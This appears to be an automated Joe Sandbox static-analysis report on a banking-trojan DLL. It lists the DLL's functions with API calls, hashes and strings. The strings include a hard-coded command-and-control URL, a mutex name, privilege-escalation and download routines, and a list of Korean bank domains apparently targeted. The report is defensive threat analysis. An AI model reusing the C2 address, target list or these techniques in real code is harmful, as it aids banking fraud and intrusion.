                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: Service$CloseHandle$OpenQueryStatus$ChangeConfigErrorLastManagerSleepStart
                                      • String ID:
                                      • API String ID: 1627767825-0
                                      • Opcode ID: 2fac1673197cf2ff6dfddec042db3646b6b08e22be202311ec5adbe7e690b690
                                      • Instruction ID: 47210d8320cb616e9ac874a10e60074c413c5e83760351a3661c9edf4b7b5ba8
                                      • Opcode Fuzzy Hash: 2fac1673197cf2ff6dfddec042db3646b6b08e22be202311ec5adbe7e690b690
                                      • Instruction Fuzzy Hash: BB115972600226ABF212EB589C48FAB3798FB887B1F808215F604D10D6DB70DB15C7B5
                                      Function 10007A80 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 131libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(urlmon.dll,00000001,00000001,100199D8), ref: 10007A97
                                      • LoadLibraryA.KERNEL32(wininet.dll), ref: 10007AA0
                                      • GetProcAddress.KERNEL32(00000000,URLDownloadToCacheFileA), ref: 10007AC9
                                      • GetProcAddress.KERNEL32(00000000,GetUrlCacheEntryInfoA), ref: 10007AD4
                                      • 6D262DD0.MFC42(00000050), ref: 10007AD8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: AddressLibraryLoadProc$D262
                                      • String ID: GetUrlCacheEntryInfoA$URLDownloadToCacheFileA$WinSta0\Default$urlmon.dll$wininet.dll
                                      • API String ID: 1173762060-1569318151
                                      • Opcode ID: 709742a31d0fadea7edc8af64177e44467c470bc28e1ea771c10d62153978372
                                      • Instruction ID: 0ba0445337995a34d0d020c410f7d090e2bbd8e81f04aadd91c8ed6f97ba3bbd
                                      • Opcode Fuzzy Hash: 709742a31d0fadea7edc8af64177e44467c470bc28e1ea771c10d62153978372
                                      • Instruction Fuzzy Hash: B441FE32A0091C6BDB15CAB88C55BEF7A66FB88310F540369F716AB2C1DEF15E45CB44
                                      Function 1000B000 Relevance: 16.7, APIs: 11, Instructions: 164memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SafeArrayGetVartype.OLEAUT32(?,?), ref: 1000B037
                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 1000B04F
                                      • 6D262DD0.MFC42(0000000C), ref: 1000B07D
                                      • SysAllocString.OLEAUT32(?), ref: 1000B09F
                                      • 6D262DD0.MFC42(0000000C), ref: 1000B0DA
                                      • InterlockedDecrement.KERNEL32(?), ref: 1000B114
                                      • InterlockedDecrement.KERNEL32(?), ref: 1000B148
                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 1000B17C
                                      • InterlockedIncrement.KERNEL32(?), ref: 1000B195
                                      • InterlockedDecrement.KERNEL32(?), ref: 1000B1A7
                                      • SysFreeString.OLEAUT32(00000000), ref: 1000B1BC
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: Interlocked$ArrayDecrementSafe$D262DataString$AccessAllocFreeIncrementUnaccessVartype
                                      • String ID:
                                      • API String ID: 3796710767-0
                                      • Opcode ID: 05ab98cb6835f449d3afe92a0ec598aecaf92792fb8f31b2b9e620e5b1815253
                                      • Instruction ID: 2f4c7833868a6a642660d5ddbd74aa3eac225ba51bae9dcfe10431cb2488e8f4
                                      • Opcode Fuzzy Hash: 05ab98cb6835f449d3afe92a0ec598aecaf92792fb8f31b2b9e620e5b1815253
                                      • Instruction Fuzzy Hash: A751CFB29047929BE710DF6588C5A5FF7E4FB84680F814A2CF885D3215E734ED85CB92
                                      Function 1000AC40 Relevance: 15.2, APIs: 10, Instructions: 188COMMON
                                      Download Yara Rule
                                      APIs
                                      • VariantInit.OLEAUT32(?), ref: 1000AC98
                                      • 6D262DD0.MFC42 ref: 1000ACA1
                                      • 6D262DD0.MFC42(0000000C), ref: 1000AD4A
                                      • VariantClear.OLEAUT32(?), ref: 1000AE0B
                                      • VariantClear.OLEAUT32(?), ref: 1000AE17
                                      • InterlockedIncrement.KERNEL32(-00000008), ref: 1000AE36
                                      • InterlockedDecrement.KERNEL32(?), ref: 1000AE4A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: Variant$ClearD262Interlocked$DecrementIncrementInit
                                      • String ID:
                                      • API String ID: 4080713044-0
                                      • Opcode ID: 30582efdfb73e3a1e08f54b0a8ea1c393c0aa53144726bcbb2eaf70a4ecd28c6
                                      • Instruction ID: 79ffa18ca43941fce37d839cf4afa098f59e3dcefab3dc036024d3061b98d5c3
                                      • Opcode Fuzzy Hash: 30582efdfb73e3a1e08f54b0a8ea1c393c0aa53144726bcbb2eaf70a4ecd28c6
                                      • Instruction Fuzzy Hash: C0619271A083829BE714CF24C845B1FB7E4EF9A794F014B1DF98197245DBB5E884CBA2
                                      Function 10009850 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 91stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: D262strstr
                                      • String ID: %s/joy.asp?sid=%s$%s|NULL|%s|%s$11121541$ECF4BB45F69E$http://$http://107.163.241.185:16300/
                                      • API String ID: 3951026917-2965986427
                                      • Opcode ID: 6a389dea83708a48e9eaed4108e65dda5b376556a2b6c1b95fe17ab307e458e2
                                      • Instruction ID: b13f840aca1df8f0e8e04d5b101a117d0290481ec4a8539e160a7b991a9b7fb1
                                      • Opcode Fuzzy Hash: 6a389dea83708a48e9eaed4108e65dda5b376556a2b6c1b95fe17ab307e458e2
                                      • Instruction Fuzzy Hash: A931B475604740ABE724CB74CC01BEB76D5EBC8340F44892CB64A8B285DF78D544C752
                                      Function 10008B90 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 30synchronizationCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 10005620: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 1000562A
                                        • Part of subcall function 10005620: OpenProcessToken.ADVAPI32(00000000), ref: 10005631
                                        • Part of subcall function 10005620: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 10005647
                                        • Part of subcall function 10005620: AdjustTokenPrivileges.KERNELBASE ref: 1000568A
                                        • Part of subcall function 10005620: CloseHandle.KERNEL32 ref: 10005695
                                      • CreateMutexA.KERNEL32(00000000,00000001,Global\98012trt8-d8dfsf,?,10008C0C), ref: 10008BAB
                                      • GetLastError.KERNEL32(?,10008C0C), ref: 10008BB3
                                      • ReleaseMutex.KERNEL32(00000000,?,?,?,10008C0C), ref: 10008BDD
                                      • CloseHandle.KERNEL32(00000000,?,?,?,10008C0C), ref: 10008BE4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: CloseHandleMutexProcessToken$AdjustCreateCurrentErrorLastLookupOpenPrivilegePrivilegesReleaseValue
                                      • String ID: ERROR_ALREADY_EXISTS$Global\98012trt8-d8dfsf$SeDebugPrivilege$c:\11.txt
                                      • API String ID: 3631164735-4205529783
                                      • Opcode ID: f7fd6434f81f715ccf36bb5118b931db28033082902ce0681c6efb333c9d0bf3
                                      • Instruction ID: 5584062bcfe8fe443fc193796f50a74a123afcaee35dc86c6677604280257fb5
                                      • Opcode Fuzzy Hash: f7fd6434f81f715ccf36bb5118b931db28033082902ce0681c6efb333c9d0bf3
                                      • Instruction Fuzzy Hash: 19E09276910020B3FA20E3606C8DEDF3D62E7967AAF550020F70AA6191DB36C9D182A2
                                      Function 1000A840 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 137memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • 6D262DD0.MFC42(0000000C,Win32_NetworkAdapterConfiguration,00000000,00000000,00000000,?,?,ROOT\CIMV2), ref: 1000A864
                                      • SysStringLen.OLEAUT32(?), ref: 1000A89E
                                      • SysStringLen.OLEAUT32(?), ref: 1000A8BB
                                      • SysAllocStringByteLen.OLEAUT32(00000000), ref: 1000A8CF
                                      • InterlockedDecrement.KERNEL32(00000008), ref: 1000A95B
                                      • SysFreeString.OLEAUT32(00000000), ref: 1000A970
                                      Strings
                                      • Win32_NetworkAdapterConfiguration, xrefs: 1000A85B
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: String$AllocByteD262DecrementFreeInterlocked
                                      • String ID: Win32_NetworkAdapterConfiguration
                                      • API String ID: 959857571-4052814535
                                      • Opcode ID: 696aefe1056031e8381074ea8d5f724c3fb411b7b74b26e6d566fbb943f84d1b
                                      • Instruction ID: 7af6534ef6524c84e344720a7089e89789d2c6adbb66ef60a0126f8e7add14fe
                                      • Opcode Fuzzy Hash: 696aefe1056031e8381074ea8d5f724c3fb411b7b74b26e6d566fbb943f84d1b
                                      • Instruction Fuzzy Hash: EB41D471B006159FE710DF18C88095EF7E5FB86684F258B29F885DB208E775ED86CB81
                                      Function 1000F7D0 Relevance: 12.2, APIs: 8, Instructions: 169fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,1000FE77,?), ref: 1000F7DE
                                      • GetFileSize.KERNEL32(?,00000000,?,00000000,?), ref: 1000F84B
                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,1000FE77), ref: 1000F86B
                                      • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 1000F882
                                      • SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,1000FE77), ref: 1000F88B
                                      • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 1000F89C
                                      • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 1000F8BC
                                      • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 1000F8CD
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: File$PointerRead$HandleInformationSize
                                      • String ID:
                                      • API String ID: 2979504256-0
                                      • Opcode ID: d88dd7143e5a55282583a39c7f48a16c409f497c41c0cca4329b838faa6cc43a
                                      • Instruction ID: 405fe81f1d8ab72a7605b9501efea937567496558c0defe8bd6331aae6a0450c
                                      • Opcode Fuzzy Hash: d88dd7143e5a55282583a39c7f48a16c409f497c41c0cca4329b838faa6cc43a
                                      • Instruction Fuzzy Hash: 9D51C1B1A04312AFF314CE54CC81FBBB7E8EF84784F10891CF68597694EA70E9059B56
                                      Function 100084D0 Relevance: 12.1, APIs: 8, Instructions: 133registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegCreateKeyExA.ADVAPI32(00000002,?,00000000,00000000,00000000,000F003F,00000000,?,?,?,00000000,00000000,80000002,00000000,DLLPath,00000002), ref: 10008527
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,0002001F,?), ref: 10008547
                                      • RegSetValueExA.ADVAPI32(?,?,00000000,?,?,?), ref: 1000857D
                                      • RegSetValueExA.ADVAPI32(?,?,00000000,?,?), ref: 100085AA
                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,0002001F,?,?,?,?,?,?,?,?,?,?,10008E45,?), ref: 100085C8
                                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 100085DA
                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,0002001F,?,?,?,?,?,?,?,?,?,?,10008E45,?), ref: 100085F8
                                      • RegDeleteValueA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,10008E45,?), ref: 1000860A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: OpenValue$Delete$Create
                                      • String ID:
                                      • API String ID: 2295199933-0
                                      • Opcode ID: 456ad6509b8fb058ab17bc1d6503d03c4a478f654bf904014c631ecf16233c95
                                      • Instruction ID: b68374bf711ffe28daf24b35b567a8d817eee2586d1f4d5131a9a979ce9dc9dd
                                      • Opcode Fuzzy Hash: 456ad6509b8fb058ab17bc1d6503d03c4a478f654bf904014c631ecf16233c95
                                      • Instruction Fuzzy Hash: 0E413AB1600249ABEB10CFA5CD88EAF77BDFB4C690B158618FA55D3256D635EE008B70
                                      Function 100057F0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileA.KERNEL32(72656472,40000000,00000000,00000000,00000002,00000080,00000000,flushdns,77068400,10007027,file error,/flushdns), ref: 10005809
                                      • WriteFile.KERNEL32(00000000,72657672,10019B1F,SearchOrder,00000000), ref: 1000582B
                                      • CloseHandle.KERNEL32(00000000), ref: 10005832
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateHandleWrite
                                      • String ID: SearchOrder$flushdns
                                      • API String ID: 1065093856-3551094870
                                      • Opcode ID: 95aecc5bbb7728e2d3004c277a4a6589035de193547edee27a9b936397a63fcc
                                      • Instruction ID: ef37b5df3fd9416dab6416b978454a5d0d7b8f3b63e71bbe0519d8d63ca187da
                                      • Opcode Fuzzy Hash: 95aecc5bbb7728e2d3004c277a4a6589035de193547edee27a9b936397a63fcc
                                      • Instruction Fuzzy Hash: 69E06D712402207BF22487249C4EFAB3A58EBC8721F108608F31A961D1CBB0AC058668
                                      Function 1000F9A0 Relevance: 7.6, APIs: 5, Instructions: 138fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,00000001,00000000,10010D09), ref: 1000F9F5
                                      • CreateFileA.KERNEL32(?,40000000,00000000,00000000,?,00000080,00000000,?,00000001,00000000,10010D09), ref: 1000FA36
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: File$CreatePointer
                                      • String ID:
                                      • API String ID: 2024441833-0
                                      • Opcode ID: 6675c2e020021266492d22b367d027f32c71b801bb070b6a2fb72d1fa451fff9
                                      • Instruction ID: 82c05d4eb222960227533bad6493fa4047be9ed8a2b8e5bde8ae66ca70aabe6a
                                      • Opcode Fuzzy Hash: 6675c2e020021266492d22b367d027f32c71b801bb070b6a2fb72d1fa451fff9
                                      • Instruction Fuzzy Hash: 7D41A0B26013418FE320CF6998C4B5BB7D8F7953A9F208A3FF199C6940C370D8999B21
                                      Function 10006A20 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 124stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • , xrefs: 10006AC4
                                      • file error, xrefs: 10006A68
                                      • www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.c, xrefs: 10006A41
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: strchr
                                      • String ID: $file error$www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.c
                                      • API String ID: 2830005266-2540400106
                                      • Opcode ID: 23491e53ffd28ee1f1fb228301a5196be38e344967e44dbb00a2e60f8e0de54f
                                      • Instruction ID: cf09df00d589f54944db86fe8f12c4b48108bc34a5b538311976df3d68cdb4a6
                                      • Opcode Fuzzy Hash: 23491e53ffd28ee1f1fb228301a5196be38e344967e44dbb00a2e60f8e0de54f
                                      • Instruction Fuzzy Hash: E031D4366049081BD72CC878981566B76C3FBC5270FA5473DBA6B876C0DEF59E48C241
                                      Function 10006E10 Relevance: 7.6, APIs: 5, Instructions: 97COMMON
                                      Download Yara Rule
                                      APIs
                                      • 6D262DD0.MFC42(00000001), ref: 10006E46
                                      • VirtualQueryEx.KERNEL32(00000000,?,?,0000001C), ref: 10006E6D
                                      • 6D262DD0.MFC42(00001000,00000000), ref: 10006EAA
                                      • ReadProcessMemory.KERNEL32(00000000,?,00000000,?,00000000), ref: 10006EC7
                                      • CloseHandle.KERNEL32(00000000), ref: 10006F21
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: D262$CloseHandleMemoryProcessQueryReadVirtual
                                      • String ID:
                                      • API String ID: 4133444876-0
                                      • Opcode ID: b4b864220a103b4f9d22497cecf06cd65cc241568f318f34bc9304c6b1666796
                                      • Instruction ID: 2f216d3c92ef82be60180469efd54965c0b310b1021fef6d999fa98d0b99ce03
                                      • Opcode Fuzzy Hash: b4b864220a103b4f9d22497cecf06cd65cc241568f318f34bc9304c6b1666796
                                      • Instruction Fuzzy Hash: A631AD717043429BE710CF18CC81A6BB3EAEBC9784F10452CFE8897245DB75EC468BA2
                                      Function 10005960 Relevance: 7.6, APIs: 5, Instructions: 80fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,10005B8D), ref: 1000599B
                                      • GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 100059B8
                                      • 6D262DD0.MFC42(00000000), ref: 100059BF
                                      • ReadFile.KERNEL32(00000000,?,00001000,?,00000000), ref: 100059FD
                                      • CloseHandle.KERNEL32(00000000), ref: 10005A37
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateD262HandleReadSize
                                      • String ID:
                                      • API String ID: 2959762680-0
                                      • Opcode ID: f27e6052ed72f7358379c96a1137fe1580c797e8f6c6e2a160a5064b2e3a8428
                                      • Instruction ID: d343087bb03fad32f03e5ae059147a2c5f7908d67b4ab7f6cbcfc06277a3a212
                                      • Opcode Fuzzy Hash: f27e6052ed72f7358379c96a1137fe1580c797e8f6c6e2a160a5064b2e3a8428
                                      • Instruction Fuzzy Hash: 4E21F571304345AFE720CB28DC85BEBB3D9FB88710F404928FB86D7280D6B5B944CA66
                                      Function 10011395 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                      Download Yara Rule
                                      APIs
                                      • wcslen.MSVCRT ref: 100113A8
                                      • 6D262DD0.MFC42(00000002,72657672,1001A365,654E5F32,00000000,00000000,10006735,00000000), ref: 100113B2
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,72657672,000000FF,00000000,00000002,00000000,00000000,1001A365,654E5F32,00000000,00000000,10006735,00000000), ref: 100113D4
                                      • GetLastError.KERNEL32 ref: 100113E4
                                      • GetLastError.KERNEL32 ref: 100113EA
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.3770418235.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000003.00000002.3770357167.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770418235.0000000010032000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770573661.0000000010034000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000003.00000002.3770592041.0000000010035000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                      Similarity
